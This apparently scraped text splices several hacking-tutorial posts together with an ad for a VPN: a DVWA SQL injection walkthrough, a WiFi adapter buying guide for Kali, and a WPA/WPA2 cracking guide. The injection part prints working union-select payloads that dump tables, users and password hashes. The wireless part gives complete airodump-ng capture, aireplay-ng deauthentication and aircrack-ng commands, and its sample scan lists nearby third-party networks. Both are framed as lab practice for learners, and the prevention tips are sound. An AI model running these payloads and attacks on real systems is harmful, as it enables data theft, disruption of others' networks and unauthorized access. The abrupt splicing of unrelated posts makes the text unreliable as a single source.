As stated above, if you haven’t configured DVWA on your system, please check out our post on How to set up DVWA on Kali Linux, which gives you a step-by-step procedure.

If you set up DVWA on your localhost, start Apache Web server and MySQl using the commands below:

sudo systemctl start apache2

systemctl start mysql

Open your browser and enter the URL 127.0.0.1/dvwa or 127.0.0.1/DVWA if you had renamed it. That will open the DVWA login page. Use the default credentials below:

• Username: admin
• Password: password

After a successful login, you will see the DVWA main page. First, click on the DVWA Security on the bottom left, set security to Low, and click Submit.

On the left section of the page, you will see the various vulnerable pages to exploit. Click SQL Injection. You should see a page similar to this below.

View the Vulnerable Code

On the SQL injection page, click the View Source button at the bottom right. That will open a page with the SQL Injection source code written in PHP. When you go through the code, you will see a line like:

$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";

That is the vulnerable line of code. At the end of the line, you can see the user input is concatenated to the SQL query without being validated. That allows us to pass arbitrary commands into the database. Let’s get started.

Basic Injection

On the SQL Injection page, we have a USER ID field. When we enter number 1, the application returns the Firstname and Surname of the user with ID 1.

If we continue trying numbers like 2,3,4 and 5, we still get an output. However, any number from 6 doesn’t return anything. Therefore, our web app has only five users. Behind the scenes, the SQL query that will execute in the database is:

SELECT First_Name,Last_Name FROM users WHERE ID='1';

Other than using the USER ID field, we can also use the URL to pass our queries. When you first enter ID 1 and click submit, the URL will look like this:

http://172.16.81.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#

The injectable part in this URL is the id field. Delete the number 1 and enter a different value like 2 or 3, as shown below. Hit Enter.

http://172.16.81.129/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit#

You will notice that this will also return the username and surname of the user with ID 2.

Always True Injection

We looked at this when talking about How an SQL Injection attack works. Enter an input like test' OR 1=1# and hit Enter. That will return the username and surname of all users in the database.

This query will display all records that are True or False. The test' parameter will probably not be equal to any user in the Database and will equal to False. The other part 1=1 will be True since 1 (one) is equal to 1 (one). The # sign to comments out any SQL code or error. The query that executes in the database looks like this;

SELECT first_name, last_name FROM users WHERE user_id = 'test' or '1'='1';

Display RDBMS and Version

By knowing the RDMS (Relational Database Management System) running under the hood, we can successfully send malicious SQL queries. Most Web application technologies like Java, ASP.NET, PHP, etc., can give us a vivid idea of the database powering the web system. For example, PHP web apps will likely use MySQL, ASP.NET apps will most likely run on Microsoft SQL Server, while Java web systems will most likely run on Oracle or MySQL. Additionally, we can try using a combination of web technology and the Operating system to determine the database. For example, a web application running on Apache and PHP on a Linux host is probably using MySQL database.

However, we cannot entirely rely on this information. If the web app is vulnerable to SQL injection, then there are queries we can use to know the RDBMS and RDBMS-version running behind the scenes.

To know the RDBMS, we will enter anything that will make the database throw an error. In this case, we enter a single quote in the USER ID field. That will make the database read anything past the quote as a string instead of an SQL query.

That will throw an error, as shown below.

This error gave us the RDBMS name but not the version. In MySQL, we have two queries that you can use to return the database version – Select version() and Select @@version. We will use the SQL query below to get the database version.

test'union select null, version()#

We can also use:

test'union select null, @@version()#

Display the hostname of our web app

To get the hostname on MySQL, we use the @@hostname query. Enter the input below in the USER ID field.

' union select null, @@hostname#

From the output above, we can see the hostname under the surname as metasploitable. Yours might be different from my mine.

Display Database User

To know the database user, we will enter the input below in the USER ID field. We will use the user() SQL function.

test' union select null, user() #

[analogy]Note: We are using Null to make the starting query valid.[/analogy]

From the output above, we can see the hostname under the surname as root@localhost.

Display the Database Name

To get the database name, we will use the database() function in our SQL query. Please note; this is not the RDBMS but the database on which our web app is running. Enter the query below:

test' union select null, database() #

You can see the name of the database under the Surname – dvwa.

List all tables in the information schema.

The Information Schema is a record that holds information about all other databases maintained by MySQL RDBMS. Enter the query below in the USER ID field.

test' and 1=0 union select null, table_name from information_schema.tables #

The tables are listed under Surname.

List all user tables in the information schema.

To display all user tables, we will start in the informarion_schema database. Enter the query below in the USER ID field and click Submit.

test' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%'#

The user tables are listed under the Surname field.

List all Column fields in the information schema users table

Enter the query below in the USER ID field and click Submit.

test' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #

From the output above, you see we have the First_name, Surname, and user_id fields listed.

Display all the column contents in the information schema users table

This is much more interesting. We will display all the authentication information of all users in the database. That includes password hashes. Enter the query below.

test' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #

From the output above, you can see the hashed password. We can go ahead and crack the hash to reveal the actual password. Some of the password cracking tools that come in handy include John the Ripper and Medusa. There are also websites where you can paste the password hash to reveal the actual password.

In this example, we will use crackstation.net to crack the password hash for the second user with the surname – Gordon.

How To Prevent SQL Injection Attacks

The main reason that makes web applications vulnerable to SQL injections dates back to the development (coding) stage. Here are some factors developers can consider to develop secure web systems.

• Validate user input
• Limit the use of special characters such as string concatenation
• Use stored procedures in the database
• Actively install security patches and updates
• Implement a Web Application Firewall
• Harden your Operating System and Applications

Summing Up

As of 2021, OWASP Top 10, a Security Framework, listed SQL injection as the number one attack mainly used by hackers and poses a significant impact on businesses and organizations. From the examples above, I believe you now understand how and why SQL injection attacks are the leading cause of massive data leaks.

The DVWA is a reliable platform where penetration testers can practice their skills and understand how various web vulnerabilities are exploited.

Most don’t know what they are, why we need them, and how to select the best adapter since we have so many brands and models available in the market.

A wireless adapter is a device that you connect to your computer via the USB port, and it allows you to connect to WiFi networks and communicate with other devices on the network.

🔥 My go-to VPN: 60% Off Special

Been using VPNBaron as my go-to for years. Their Trojan protocol makes it actually undetectable when needed, support is crazy responsive, and they’re running a rare 60% off right now. Works on all devices, adapts to whatever you’re trying to do.

1.99$/month

However, you might wonder: “Why would I need a USB network adapter since my laptop already has an inbuilt adapter that enables me to connect to wireless networks?”

Well, this is among the topics that we will discuss in this post:

• Problems with Built-in Wireless Cards
• Best WiFi adapters for hacking
• How to connect a wireless adapter to Kali Linux Virtual machine

Problems With Built-in Wireless Cards

There are two main problems with built-in WiFi adapters.

1. They can’t be used in Virtual machines – Kali inside a VM does not see the built-in WiFi card of your laptop as a WiFi adapter but will see it as an ethernet adapter. Hence you can have full internet access, but you cannot do packet injection or place the WiFi card into monitor mode.
2. Most built-in cards are not suitable for hacking – In wireless hacking, there are two main factors that we look out for in adapters. That is ‘packet infection’ and support for ‘monitor mode.’ Unfortunately, most of the built-in adapters support non of these two features.

Best WiFi Adapters for Hacking (With Monitor Mode)

Before diving into the different WiFi adapter brands and models, we first need to understand the Wireless Chipset present in these adapters. Like the CPU we have in a computer, this chipset is the “Brains” of the wireless adapter.

It is responsible for all the processing and calculation of data flowing through it. It also determines the capability of the wireless adapter. Whether it can support monitor mode, packet injection, and works with Kali Linux or not.

Some of the chipset supported by Kali Linux include:

• Realtek RTL8812AU
• Realtek 8187L
• Ralink RT5370N
• Ralink RT3572
• Ralink RT5572
• Ralink RT3070
• Ralink RT307
• Atheros AR9271
• MT7610U
• MT7612U

I understand all this information looks gibberish as of now; however, you will appreciate it when we look at the different WiFi adapters available and the chipset they use.

You will notice that the ALFA Networks company highly dominates the Wireless adapter market. Over the past couple of years, the company has risen to stand as the perfect supplier for efficient and reliable WIFI adapters. Other companies include TP-Link and Panda.

The table below shows a list of wireless adapters supported by Kali Linux and the Chipset, Frequency, and Protocol they are using.

Important: When it comes to TP-LINK TL-WN722N, it’s important to know that you can also get v2/v3 to work with a few workarounds, although it’s sometimes assumed that only v1 works.

A great and detailed tutorial on this topic is this one from David Bombal – Kali Linux TP-Link TP-WN722N.

TL-WN722N is a decent budget WiFi adapter for our purposes, but it’s sometimes difficult to find v1 in your immediate area, so v2/v3 is definitely a good option.

In some cases you won’t find the adapter’s version in the product description, so I think it’s definitely good to know you can make it work no matter which of those versions it is.

Connect a Wireless Adapter to Kali Linux Virtual Machine (VirtualBox)

To connect a wireless adapter to your Kali Linux virtual machine, when using VirtualBox, you can go in the Oracle VM VirtualBox menu > Devices > USB > [select_your_adapter].

It may not list the name of the WiFi Adapter, but something related to the chipset, instead. Here, I’m using a TP-LINK TL-WN722N 2.4GHz v2/v3, and as you can see, it’s displaying Realtek 802.11n NC.

Automatically Connect the WiFi Adapter to a VirtualBox VM

You can also automatically connect a wireless adapter to your Kali Linux virtual machine, when running VirtualBox. This way, you don’t have to manually connect it every time

To do this follow the steps below:

1. Shutdown the Kali virtual machine if it was already running
2. Connect your Wireless USB adapter to your PC
3. Right-click on your Kali Virtual machine and select the Settings option. A window will open displaying all the different configuration options.
4. Click on the USB option and check the Enable USB controller check box.
   
   

   

   
   
   We will need to add a USB filter on this window that will enable us to mount our wireless adapter to the Kali VirtualBox VM.
5. Click on the USB icon that has a plus (+) sign and select your Wireless adapter.
   Note: Be careful since the adapter may appear with the chipset na,e instead of the Brand name. For example, my adapter in this case is TP-LINK TL-WN722N 2.4GHz v1 but was listed under the chipset name Atheros AR9271.
   
   If you are not sure of the adapter’s name, just remove it, and you will notice the name that will disappear from the VirtualBox USB list.
   
   

   

   
   
6. Your wireless adapter will be listed under the “USB Device Filters” section.
   
   

   

   
   
7. To finalize everything, right-click on your newly added USB filter and select the Edit Filters option.
   A window will open listing all the details about your wireless adapter. Then, on the Remote option, click on the dropdown and select Yes.
   
   

   

   
   
8. Click Ok to save your configurations.

Connect a Wireless Adapter to Kali Linux Virtual Machine (VMware Player)

To connect a wireless adapter to your Kali Linux virtual machine, when using VMware Player, you can go to the VMware Player menu > Player > Removable Devices > [your_adapter] > Connect (Disconnect from host).

It may not list the name of the WiFi Adapter, but something related to the chipset, instead. Here, I’m using a TP-LINK TL-WN722N 2.4GHz v2/v3, and as you can see, it’s displaying Realtek 802.11n NC.

You should then receive a message informing you that the device will be safely stopped and disconnected from the host machine, so it can then be connected to Kali Linux in the VMware player.

I’m not sure of an easy way how you can automatically connect a WiFi Adapter with VMware Player, as we did with VirtualBox. The solution in VMware knowledge base seems to involve a bit of work https://kb.vmware.com/s/article/1648, and I haven’t tried it myself. If anyone has an easier solution for this and would like to share, then we’d love to hear from you.

Conclusion

Now you can boot your Kali VM and start practicing your wireless hacking skills. You can list all the wireless networks around you and even put your card in monitor mode.

I believe up to this point, you have a working wireless adapter on your Kali Linux VirtualBox machine. Please remember when selecting an adapter for wireless hacking to ensure the chipset used is among the chipsets listed above.

That involves, Cracking WIFI passwords (WEP, WPA, WPA2), Deauthentication attacks (disconnecting users on a WIFI network), Man In The Middle (MITM) attacks, packet-sniffing, and packet-analysis.

This post will give you a detailed guide on cracking WPA/WPA2 WiFi passwords using Kali Linux.

Important: In this article I’ll be demonstrating how to crack a password on my WiFi network. Please do not use this method for non-ethical purposes.

Understanding How Networks Operate

Before looking at how to crack WiFi passwords, you need to understand how a network operates. A network usually contains several devices connected using a wired (Ethernet, Fiber, etc.) or wireless connection (WiFi, Bluetooth, etc.) to share resources. An excellent example of a resource that we connect to networks to access is the Internet.

Whether you are on a wired or wireless network, one device is always considered a server. For example, if you are on a home network, the server would be the router/Access point. To connect to the internet, a Device(A) will send a request to the router, which will, in turn, fetch what you want from the Internet. Data transmitted between the client and the Access Point is known as Packets.

This tutorial will teach you how to capture these packets and use them to crack WPA and WPA2 passwords.

Managed Mode and Monitor Mode?

Every device with access to the internet comes with a chip known as the Network Interface Card (NIC). This chip is responsible for capturing packets sent by the router to our device.

By default, it is set to Managed Mode. That means it can only listen to packets sent directly to our device (packets with our devices’ MAC address as the destination MAC). To crack a WPA or WPA2 WIFi, we need to capture many of these packets. Therefore, we will set our NIC to Monitor Mode. In Monitor Mode, the card will listen to all packets being sent by the router capturing as many packets as possible.

Up to this point, I believe you now have the basic knowledge required to get you started with Network hacking. Boot your Kali Linux machine, and we can begin to crack WiFi passwords.

An Overview of How The Method Works

To give you a short and simple overview so you know what’s coming up, we will:

1. Set our wireless network adapter in monitor mode so it can listen for packets
2. List all available WiFi networks
3. Target a single WiFi network from which we’ll try to capture Handshake packets – these are packets transmitted between the router and the client computer, when they’re trying to establish a connection. We want to capture these packets, because some of them will contain the hashed password.
4. We won’t be decrypting the hashed password, but it still provides a valuable clue. Next we’ll use a large list of popular passwords, and we’ll turn each one into a hashed form, and compare them with the WiFi password, in it’s hashed form, that we got from listening to packets.
5. When the hashes match, this means that we found the password.

Important Notes

1. In our tutorial we’ll use a popular list of passwords, called rockyou.txt, that comes with Kali Linux.
2. If the password you’re trying to crack isn’t in the passwords list, also called wordlist, then we won’t be able to crack it.
3. You can check if the password is in the wordlist by running something like sudo grep -F 'yourpassword' /usr/share/rockyou.txt.
4. Keep in mind that /usr/share/rockyou.txt is archived by default, into /usr/share/rockyou.txt.gz, so you’ll have to extract it first. To do this you can run:
   cd /usr/share/wordlists && sudo gzip -d rockyou.txt.gz

Step 1. Put Your Card in Monitor Mode

On your Kali machine, open the Terminal and execute the command below to list all the connected network devices.

ifconfig

Or

ip a

Related: In case you’re also running Kali Linux in a virtual machine, here is a tutorial on how to connect wireless adapter to Kali Linux in VirtualBox/VMware – Connecting a Wireless Adapter to a Kali Linux Virtual Machine. It also covers the types of wireless adapters you can place in monitor mode and that can do packet injection.

In Kali, the Wireless card will be listed as something like wlan0. I’m using Kali Linux in VirtualBox, with a wireless adapter connected.

In my case, the WiFi network is listed as wlan0:

eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.0.2.15  netmask 255.255.255.0  broadcast 10.0.2.255
        inet6 fe80::a00:27ff:fe2f:7ffe  prefixlen 64  scopeid 0x20<link>
        ether 08:00:27:2f:7f:fe  txqueuelen 1000  (Ethernet)
        RX packets 1  bytes 590 (590.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 16  bytes 1452 (1.4 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 16  bytes 880 (880.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 16  bytes 880 (880.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 2312
        unspec ca-d3-dd-57-cf-30-00-B9-00-00-00-00-00-00-00-00  txqueuelen 1000  (UNSPEC)
        RX packets 20790  bytes 0 (0.0 B)
        RX errors 0  dropped 20790  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

To put your wireless adapter in monitor mode (a mode where the adapter can capture all kinds of WiFi packets) , we will use a tool known as airmon-ng. Execute the command below and replace wlan0 with the name of your wireless card.

sudo airmon-ng start wlan0

Found 2 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode

    PID Name
    399 NetworkManager
   1142 wpa_supplicant

PHY     Interface       Driver          Chipset

phy0    wlan0           8188eu          TP-Link TL-WN722N v2/v3 [Realtek RTL8188EUS]
                (mac80211 monitor mode already enabled for [phy0]wlan0 on [phy0]wlan0)

Note: You won’t access the internet with your card in monitor mode. It will not even be listed under the network devices on your Settings app.

If your card keeps reverting to Managed mode, you will need to kill all interfering processes with the command below.

sudo airmon-ng check kill

Killing these processes:

    PID Name
   1142 wpa_supplicant

To check whether your card was successfully put to monitor mode, execute the command below:

iwconfig

lo        no wireless extensions.

eth0      no wireless extensions.

wlan0     IEEE 802.11b  ESSID:""  Nickname:"<WIFI@REALTEK>"
          Mode:Monitor  Frequency:2.457 GHz  Access Point: Not-Associated   
          Sensitivity:0/0  
          Retry:off   RTS thr:off   Fragment thr:off
          Power Management:off
          Link Quality=0/100  Signal level=-100 dBm  Noise level=0 dBm
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0

From the image above, you can see the wlan0 card is set to Monitor mode. In some cases, the Kali system will add the suffix “mon” to any card in Monitor mode. For example, wlan0 would be renamed to wlan0mon. If that’s the case for you, that is the name you will use anytime you want to call the WiFi card.

Step 2. Test Your Card For Packet Injection

In most wireless attacks, you will need to perform packet injection (Forging or spoofing packets) and unfortunately, not all Network Cards support packet injection.

To test your card for packet injection, execute the command below and ensure you are near WiFi networks. Remember to replace wlan1 with the name of your wireless card in monitor mode.

sudo aireplay-ng --test wlan0

20:10:12  Trying broadcast probe requests...
20:10:12  Injection is working!
20:10:14  Found 7 APs

20:10:14  Trying directed probe requests...
20:10:14  73:6F:5F:92:73:DD - channel: 1 - 'N00bLx Office'
20:10:14  Ping (min/avg/max): 1.831ms/9.501ms/16.956ms Power: -65.80
20:10:14  30/30: 100%

From the image above, you can see my card can inject packets into the network. If that’s not the case for you, you can buy a USB Network card (WiFi dongle) that supports packet injection.

You can also find a list of recommended network cards, along with beginner friendly explanations, in our related tutorial Connecting a Wireless Adapter to a Kali Linux Virtual Machine.

Step 3. Packet Sniffing Using Airodump-ng

Now that we have enabled Monitor mode on our wireless card and even tested it for packet injection, we can now capture packets on our WiFi networks. We will use a tool known as airodump-ng. Execute the command below and press Enter.

sudo airodump-ng <wifi-card-in-monitor-mode>

In my case, I’ll run:

sudo airodump-ng wlan0

CH  4 ][ Elapsed: 12 s ][ 2021-08-27 20:16                                                
                                                                                          
BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID           
                                                                                          
17:5A:78:5B:AE:56  -69       44        0    0   1   65   WPA2 CCMP   PSK  Mrs. Test WiFi Network
07:E1:B2:8E:0E:82  -50       49        0    0   6   54e. WPA2 TKIP   PSK  N00bLx Bathroom WiFi          
17:93:7E:F0:FF:A8  -51       41       35    5   1  130   WPA2 CCMP   PSK  The Neighbour       
D3:DA:6D:87:61:86  -52       45        0    0   6   54e. WPA  TKIP   PSK  <length:  0>    
73:6F:5F:92:73:DD  -57       41        0    0   1  130   WPA2 CCMP   PSK  N00bLx Office       
73:E4:D1:03:B1:8D  -65       37        0    0   1  130   WPA2 CCMP   PSK  Mayor's Office      
9B:9D:78:DC:92:43  -67       45        0    0   8  130   WPA2 CCMP   PSK  Sheshe          
AB:25:7A:0A:5C:42  -77       33        4    0   8  130   WPA2 CCMP   PSK  Skynet-4114   
AB:AA:DC:10:4D:3F  -76       27        0    0  10  130   WPA2 CCMP   PSK  Mark_cdd5e8     
B3:10:82:55:F1:57  -86       21        0    0  11  130   WPA2 CCMP   PSK  MARK-7NfA       
2F:78:E6:5B:0F:2B  -93       40        1    0   5  540   WPA2 CCMP   PSK  home network     
AB:30:6D:D1:31:E5  -93       27        0    0   6  130   WPA2 CCMP   PSK  Mobile-1615   
F3:F1:AE:18:A2:46  -93        4        0    0   1   48   WPA2 CCMP   PSK  MrBot_80     
63:8C:27:81:CB:8D  -93        2        0    0  11  130   WPA2 CCMP   PSK  UPC2076594      
D7:BF:F1:DF:52:23  -93        3        0    0   5  130   WPA2 CCMP   PSK  Bob      
EB:48:C0:6D:98:35  -86       24        7    2   3  130   WPA2 CCMP   PSK  TP-Link_47F0    
07:E1:06:1A:32:B1  -89       35        0    0  11  130   WPA2 CCMP   PSK  Some Netowrk       
4F:FB:76:4D:66:EA  -93       14        0    0  11  130   WPA2 CCMP   PSK  Mobile-746339   
9B:53:21:87:20:38  -93       17        2    0   3  130   WPA2 CCMP   PSK  LALA124173       
E3:88:A3:6E:6B:F5  -93        5        0    0   1  130   WPA2 CCMP   PSK  HAI-Fh9n       
CB:9B:94:7E:0A:AE  -93        2        0    0   1  130   WPA2 CCMP   PSK  BATMAN2629688      
6B:8B:B1:59:88:0E  -93        9        0    0   1  130   WPA2 CCMP   PSK  HI              
                                                                                     
                                                                                          
BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes         
                                                                                          
(not associated)   33:C6:35:3F:05:D8  -94    0 - 1     41       10         LALA-4qnS      
(not associated)   57:B1:C8:C5:37:1B  -94    0 - 1      0        1                        
0F:93:59:43:F0:E4  23:1D:97:42:42:F3   -1    1e- 0      0        3                        
0F:93:59:43:F0:E4  9B:C5:40:6E:34:34   -1    1e- 0      0        3                        
0F:93:59:43:F0:E4  13:17:36:01:1A:D2   -1    1e- 0      0        2                        
0F:93:59:43:F0:E4  53:85:C5:90:21:D9  -74    1e- 1e     8       12

You will see a screen similar to the one in the image above. The program will continue running unless you close it using Ctrl + C or Ctrl + Z.

Let’s discuss the information on this screen.

• BSSID: This column displays the MAC address of the target network. That is the MAC address of the router or the Access Point.
• PWR: This is the signal strength or the power of the network. The closer the number is to zero, the better signal we will get.
• Beacons: These are frames sent by the Access point to broadcast its existence
• Data: These are the valuable data packets or frames that will help us in cracking wireless networks
• #/S: This column shows us the number of data packets we have collected in the last 10 seconds
• CH: This column indicates the channel on which the network is operating.
• MB: That indicates the maximum speed supported by the network.
• ENC: This column indicates the encryption used by the network
• CIPHER: Indicates the Cipher used on the network
• Auth: This shows the mode of authentication used to connect to the network
• ESSID: This column indicates the name of the WIFI network

In this step, all we did was random packet sniffing. We did not target any particular WiFi network or store the sniffed packets.

However, that is useful since it gives you detailed information about networks near you.

In the next step, we will look at targeted packet sniffing.

Step 4. Targeted Packet Sniffing

The difference between WPA and WPA2 is that WPA uses TKIP (Temporal Key Integrity Protocol) while the latter is capable of using TKIP and any other advanced AES algorithm. However, the method that we will use to crack the password is the same for both networks.

To crack WPA/WPA2 wifi networks, we will utilize the handshake packets. These are four packets transmitted between the router and the client when establishing a network connection. To capture packets on a specific network, we will use the syntax below.

sudo airodump-ng --bssid <MAC-of-AccessPoint> --channel <channel-number> --write <name-of-file> <card-name>

From the image above, I will be cracking the password for the network with ESSID “Mrs. Test WiFi” I will use the command below.

sudo airodump-ng --bssid 17:5A:78:5B:AE:56 --channel 1 --write mrstestwifiPackets wlan0

Now all you need to do is sit back and wait for the tool to capture as many Handshake packets as possible.

CH  1 ][ Elapsed: 6 s ][ 2021-08-27 20:20                                                                                      
                                                                                                                               
BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID                                            
                                                                                                                               
17:5A:78:5B:AE:56  -22  93       88        0    0   1   65   WPA2 CCMP   PSK  Mrs. Test WiFi Network                           
                                                                                                                               
BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes

However, there is one problem.

Handshake packets are only captured once – when a device connects to the network. Therefore, to capture as many handshake packets as possible, we will need to use an attack to remove users from the network and reconnect. Deauthentication attack. That will help us capture more handshake packets.

To carry out a deuathentication attack, open a new Terminal, while leaving the current one running and trying to capture Handshake packets, and execute the command below:

sudo aireplay-ng --deauth 50 -a <BSSID-MAC> <Wireless-Card>

In my case, I’ll run:

sudo aireplay-ng --deauth 50 -a 17:5A:78:5B:AE:56 wlan0

20:32:03  Waiting for beacon frame (BSSID: 17:5A:78:5B:AE:56) on channel 1
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
20:32:03  Sending DeAuth (code 7) to broadcast -- BSSID: [17:5A:78:5B:AE:56]
20:32:03  Sending DeAuth (code 7) to broadcast -- BSSID: [17:5A:78:5B:AE:56]
20:32:04  Sending DeAuth (code 7) to broadcast -- BSSID: [17:5A:78:5B:AE:56]
20:32:05  Sending DeAuth (code 7) to broadcast -- BSSID: [17:5A:78:5B:AE:56]
20:32:05  Sending DeAuth (code 7) to broadcast -- BSSID: [17:5A:78:5B:AE:56]
20:32:06  Sending DeAuth (code 7) to broadcast -- BSSID: [17:5A:78:5B:AE:56]
...

The command will send 50 deauthentication packets, which are enough to disconnect several clients from the router. Once they reconnect, we will capture their handshake packets. All these packets are stored in the “mrtestwifiPackets” file we specified when performing a targeted sniffing.

Step 5. Cracking WPA/WPA2 Using a Wordlist

When we have captured enough Handshake packets, we can start to crack them using a wordlist.

Execute the ls command on your working directory. You will see several files with the name which you specified to save your sniffed packets. Look for the file with the .cap extension. That is the file we will use to crack our WiFi password.

The tool that we will use is known as aircrack-ng. Use the syntax below:

sudo aircrack-ng <packet-file-name> -w <wordlist_path>

In my case, I will run:

sudo aircrack-ng mrstestwifiPackets.cap -w /usr/share/wordlists/rockyou.txt

And here is the successfully cracked WiFi key.

As you can see where it says KEY FOUND! [ mrpassword].

This process might take some time, depending on your wordlist and the complexity of the key. Some tips you can use to speed up the process are using the GPU, which is much faster, or uploading the captured handshake file to an online cracking site. These sites use powerful computers which can crack passwords even faster. You can also create your wordlist using a Python or Bash script or use the crunch tool.

Conclusion

This tutorial has given you a detailed guide on cracking WPA/WPA2 key against a wordlist. With a large wordlist, you can easily crack different combinational passwords. However, if the key is very complex, using a wordlist may not always work. If you encountered any issues, then feel free to let us know in the comments and we’ll get back to you as soon as we can.